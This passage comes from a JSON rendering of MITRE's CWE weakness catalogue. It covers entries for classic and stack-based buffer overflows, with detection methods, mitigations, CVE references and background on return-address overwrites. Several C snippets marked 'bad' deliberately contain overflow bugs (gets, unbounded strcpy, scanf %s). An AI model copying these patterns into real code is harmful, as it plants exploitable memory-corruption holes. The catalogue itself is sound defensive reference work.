analysis"]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-3"},"Phase":"Requirements","Strategy":"Language Selection","Description":{"xhtml:p":["Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, many languages that perform their own memory management, such as Java and Perl, are not subject to buffer overflows. Other languages, such as Ada and C#, typically provide overflow protection, but the protection can be disabled by the programmer.","Be wary that a language\'s interface to native code may still be subject to overflows, even if the language itself is theoretically safe."]}},{"attr":{"@_Mitigation_ID":"MIT-4.1"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","Examples include the Safe C String Library (SafeStr) by Messier and Viega [REF-57], and the Strsafe.h library from Microsoft [REF-56]. These libraries provide safer versions of overflow-prone string-handling functions."]},"Effectiveness_Notes":"This is not a complete solution, since many buffer overflows are not related to strings."},{"attr":{"@_Mitigation_ID":"MIT-10"},"Phase":"Build and Compilation","Strategy":"Compilation or Build Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that automatically provide a protection mechanism that mitigates or eliminates buffer overflows.","For example, certain compilers and extensions provide automatic buffer overflow detection mechanisms that are built into the compiled code. Examples include the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not necessarily a complete solution, since these mechanisms can only detect certain types of overflows. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-9"},"Phase":"Implementation","Description":{"xhtml:p":"Consider adhering to the following rules when allocating and managing an application\'s memory:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Double check that your buffer is as large as you specify.","When using functions that accept a number of bytes to copy, such as strncpy(), be aware that if the destination buffer size is equal to the source buffer size, it may not NULL-terminate the string.","Check buffer boundaries if accessing the buffer in a loop and make sure there is no danger of writing past the allocated space.","If necessary, truncate all input strings to a reasonable length before passing them to the copy and concatenation functions."]}}}},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"attr":{"@_Mitigation_ID":"MIT-11"},"Phase":"Operation","Strategy":"Environment Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that randomly arrange the positions of a program\'s executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code.","Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution. However, it forces the attacker to guess an unknown value that changes every program execution. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-12"},"Phase":"Operation","Strategy":"Environment Hardening","Description":"Use a CPU and operating system that offers Data Execution Protection (NX) or its equivalent [REF-60] [REF-61].","Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software\'s state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application."},{"Phase":["Build and Compilation","Operation"],"Description":"Most mitigating technologies at the compiler or OS level to date address only a subset of buffer overflow problems and rarely provide complete protection against even that subset. It is good practice to implement strategies to increase the workload of an attacker, such as leaving the attacker to guess an unknown value that changes every program execution."},{"attr":{"@_Mitigation_ID":"MIT-13"},"Phase":"Implementation","Description":"Replace unbounded copy functions with analogous functions that support length arguments, such as strcpy with strncpy. Create these if they are not available.","Effectiveness":"Moderate","Effectiveness_Notes":"This approach is still susceptible to calculation errors, including issues such as off-by-one errors (CWE-193) and incorrectly calculating buffer lengths (CWE-131)."},{"attr":{"@_Mitigation_ID":"MIT-21"},"Phase":"Architecture and Design","Strategy":"Enforcement by Conversion","Description":"When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."},{"attr":{"@_Mitigation_ID":"MIT-22"},"Phase":["Architecture and Design","Operation"],"Strategy":"Sandbox or Jail","Description":{"xhtml:p":["Run the code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.","OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]},"Effectiveness":"Limited","Effectiveness_Notes":"The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code asks the user to enter their last name and then attempts to store the value entered in the last_name array.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char last_name[20];printf (\\"Enter your last name: \\");scanf (\\"%s\\", last_name);","xhtml:br":["",""]}},"Body_Text":"The problem with the code above is that it does not restrict or limit the size of the name entered by the user. If the user enters \\"Very_very_long_last_name\\" which is 24 characters long, then a buffer overflow will occur since the array can only hold 20 characters total."},{"attr":{"@_Demonstrative_Example_ID":"DX-6"},"Intro_Text":"The following code attempts to create a local copy of a buffer to perform some manipulations to the data.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void manipulate_string(char * string){}","xhtml:div":{"#text":"char buf[24];strcpy(buf, string);...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"However, the programmer does not ensure that the size of the data pointed to by string will fit in the local buffer and copies the data with the potentially dangerous strcpy() function. This may result in a buffer overflow condition if an attacker can influence the contents of the string parameter."},{"attr":{"@_Demonstrative_Example_ID":"DX-5"},"Intro_Text":"The code below calls the gets() function to read in data from the command line.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"}","xhtml:div":{"#text":"char buf[24];printf(\\"Please enter your name and press <Enter>\\\\n\\");gets(buf);...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}},"Body_Text":"However, gets() is inherently unsafe, because it copies all input from STDIN to the buffer without checking size. This allows the user to provide a string that is larger than the buffer size, resulting in an overflow condition."},{"Intro_Text":"In the following example, a server accepts connections from a client and processes the client request. After accepting a client connection, the program will obtain client information using the gethostbyaddr method, copy the hostname of the client that connected to a local variable and output the hostname of the client to a log file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"......","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"struct hostent *clienthp;char hostname[MAX_LEN];// create server socket, bind to server address and listen on socket...// accept client connections and process requestsint count = 0;for (count = 0; count < MAX_CONNECTIONS; count++) {}close(serversocket);","xhtml:br":["","","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int clientlen = sizeof(struct sockaddr_in);int clientsocket = accept(serversocket, (struct sockaddr *)&clientaddr, &clientlen);if (clientsocket >= 0) {}","xhtml:br":["","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"clienthp = gethostbyaddr((char*) &clientaddr.sin_addr.s_addr, sizeof(clientaddr.sin_addr.s_addr), AF_INET);strcpy(hostname, clienthp->h_name);logOutput(\\"Accepted client connection from host \\", hostname);// process client request...close(clientsocket);","xhtml:br":["","","","","",""]}}}}}},"xhtml:br":""}},"Body_Text":"However, the hostname of the client that connected may be longer than the allocated size for the local hostname variable. This will result in a buffer overflow when copying the client hostname to the local variable using the strcpy method."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-1094","Description":"buffer overflow using command with long argument","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1094"},{"Reference":"CVE-1999-0046","Description":"buffer overflow in local program using long environment variable","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0046"},{"Reference":"CVE-2002-1337","Description":"buffer overflow in comment characters, when product increments a counter for a \\">\\" but does not decrement for \\"<\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1337"},{"Reference":"CVE-2003-0595","Description":"By replacing a valid cookie value with an extremely long string of characters, an attacker may overflow the application\'s buffers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0595"},{"Reference":"CVE-2001-0191","Description":"By replacing a valid cookie value with an extremely long string of characters, an attacker may overflow the application\'s buffers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0191"}]},"Functional_Areas":{"Functional_Area":"Memory Management"},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unbounded Transfer (\'classic overflow\')"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Buffer Overflow"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Buffer overflow"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A1","Entry_Name":"Unvalidated Input","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A5","Entry_Name":"Buffer Overflows","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR31-C","Entry_Name":"Guarantee that storage for strings has sufficient space for character data and the null terminator","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":7,"Entry_Name":"Buffer Overflow"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP8","Entry_Name":"Faulty Buffer Access"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-120"},{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-CWE-120"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"10"}},{"attr":{"@_CAPEC_ID":"100"}},{"attr":{"@_CAPEC_ID":"14"}},{"attr":{"@_CAPEC_ID":"24"}},{"attr":{"@_CAPEC_ID":"42"}},{"attr":{"@_CAPEC_ID":"44"}},{"attr":{"@_CAPEC_ID":"45"}},{"attr":{"@_CAPEC_ID":"46"}},{"attr":{"@_CAPEC_ID":"47"}},{"attr":{"@_CAPEC_ID":"67"}},{"attr":{"@_CAPEC_ID":"8"}},{"attr":{"@_CAPEC_ID":"9"}},{"attr":{"@_CAPEC_ID":"92"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 5, "Public Enemy #1: The Buffer Overrun" Page 127"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 5: Buffer Overruns." Page 89"}},{"attr":{"@_External_Reference_ID":"REF-56"}},{"attr":{"@_External_Reference_ID":"REF-57"}},{"attr":{"@_External_Reference_ID":"REF-58"}},{"attr":{"@_External_Reference_ID":"REF-59"}},{"attr":{"@_External_Reference_ID":"REF-60"}},{"attr":{"@_External_Reference_ID":"REF-74"}},{"attr":{"@_External_Reference_ID":"REF-61"}},{"attr":{"@_External_Reference_ID":"REF-76"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 3, "Nonexecutable Stack", Page 76"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 5, "Protection Mechanisms", Page 189"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, "C String Handling", Page 388"}},{"attr":{"@_External_Reference_ID":"REF-64"}},{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-CWE-120"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-120"}}]},"Notes":{"Note":[{"#text":"At the code level, stack-based and heap-based overflows do not differ significantly, so there usually is not a need to distinguish them. From the attacker perspective, they can be quite different, since different techniques are required to exploit them.","attr":{"@_Type":"Relationship"}},{"#text":"Many issues that are now called \\"buffer overflows\\" are substantively different than the \\"classic\\" overflow, including entirely different bug types that rely on overflow exploit techniques, such as integer signedness errors, integer overflows, and format string bugs. This imprecise terminology can make it difficult to determine which variant is being reported.","attr":{"@_Type":"Terminology"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-10","Modification_Comment":"Changed name and description to more clearly emphasize the \\"classic\\" nature of the overflow."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Alternate_Terms, Description, Name, Other_Notes, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Other_Notes, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences, Other_Notes, Potential_Mitigations, References, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Other_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Detection_Factors, Potential_Mitigations, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Demonstrative_Examples, Likelihood_of_Exploit, References, Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Alternate_Terms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Unbounded Transfer (\'Classic Buffer Overflow\')","attr":{"@_Date":"2008-10-14"}}}},"121":{"attr":{"@_ID":"121","@_Name":"Stack-based Buffer Overflow","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A stack-based buffer overflow condition is a condition where the buffer being overwritten is allocated on the stack (i.e., is a local variable or, rarely, a parameter to a function).","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"788","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"787","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Background_Details":{"Background_Detail":"There are generally several security-critical data on an execution stack that can lead to arbitrary code execution. The most prominent is the stored return address, the memory address at which execution should continue once the current function is finished executing. The attacker can overwrite this value with some memory address to which the attacker also has write access, into which they place arbitrary code to be run with the full privileges of the vulnerable program. Alternately, the attacker can supply the address of an important call, for instance the POSIX system() call, leaving arguments to the call on the stack. This is often called a return into libc exploit, since the attacker generally forces the program to jump at return time into an interesting routine in the C standard library (libc). Other important data commonly on the stack include the stack pointer and frame pointer, two values that indicate offsets for computing memory addresses. Modifying those values can often be leveraged into a \\"write-what-where\\" condition."},"Alternate_Terms":{"Alternate_Term":{"Term":"Stack Overflow","Description":"\\"Stack Overflow\\" is often used to mean the same thing as stack-based buffer overflow, however it is also used on occasion to mean stack exhaustion, usually a result from an excessively recursive function call. Due to the ambiguity of the term, use of stack overflow to describe either circumstance is discouraged."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["Modify Memory","DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)"],"Note":"Buffer overflows generally lead to crashes. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop."},{"Scope":["Integrity","Confidentiality","Availability","Access Control"],"Impact":["Modify Memory","Execute Unauthorized Code or Commands","Bypass Protection Mechanism"],"Note":"Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of a program\'s implicit security policy."},{"Scope":["Integrity","Confidentiality","Availability","Access Control","Other"],"Impact":["Modify Memory","Execute Unauthorized Code or Commands","Bypass Protection Mechanism","Other"],"Note":"When the consequence is arbitrary code execution, this can often be used to subvert any other security service."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-10"},"Phase":"Build and Compilation","Strategy":"Compilation or Build Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that automatically provide a protection mechanism that mitigates or eliminates buffer overflows.","For example, certain compilers and extensions provide automatic buffer overflow detection mechanisms that are built into the compiled code. Examples include the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not necessarily a complete solution, since these mechanisms can only detect certain types of overflows. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"Phase":"Architecture and Design","Description":"Use an abstraction library to abstract away risky APIs. Not a complete solution."},{"Phase":"Build and Compilation","Description":"Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution."},{"Phase":"Implementation","Description":"Implement and perform bounds checking on input."},{"Phase":"Implementation","Description":"Do not use dangerous functions such as gets. Use safer, equivalent functions which check for boundary errors."},{"Phase":"Operation","Description":"Use OS-level preventative functionality, such as ASLR. This is not a complete solution."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"While buffer overflow examples can be rather complex, it is possible to have very simple, yet still exploitable, stack-based buffer overflows:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define BUFSIZE 256int main(int argc, char **argv) {}","xhtml:br":"","xhtml:div":{"#text":"char buf[BUFSIZE];strcpy(buf, argv[1]);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":"The buffer size is fixed, but there is no guarantee the string in argv[1] will not exceed this size and cause an overflow."},{"attr":{"@_Demonstrative_Example_ID":"DX-1"},"Intro_Text":"This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void host_lookup(char *user_supplied_addr){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp);validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp->h_name);","xhtml:br":["","","","","","","","","",""],"xhtml:i":"/*routine that ensures user_supplied_addr is in the right format for conversion */"}}}},"Body_Text":["This function allocates a buffer of 64 bytes to store the hostname, however there is no guarantee that the hostname will not be larger than 64 bytes. If an attacker specifies an address which resolves to a very large hostname, then the function may overwrite sensitive data or even relinquish control flow to the attacker.","Note that this example also contains an unchecked return value (CWE-252) that can lead to a NULL pointer dereference (CWE-476)."]}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Stack overflow"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP8","Entry_Name":"Faulty Buffer Access"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR38-C","Entry_Name":"Guarantee that library functions do not form invalid pointers","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR31-C","Entry_Name":"Guarantee that storage for strings has sufficient space for character data and the null terminator","Mapping_Fit":"CWE More Specific"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1029"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 5, "Stack Overruns" Page 129"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 5: Buffer Overruns." Page 89"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 3, "Nonexecutable Stack", Page 76"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 5, "Protection Mechanisms", Page 189"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Notes":{"Note":{"#text":"Stack-based buffer overflows can instantiate in return address overwrites, stack pointer overwrites or frame pointer overwrites. They can also be considered function pointer overwrites, array indexer overwrites or write-what-where condition, etc.","attr":{"@_Type":"Other"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Background_Details, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content 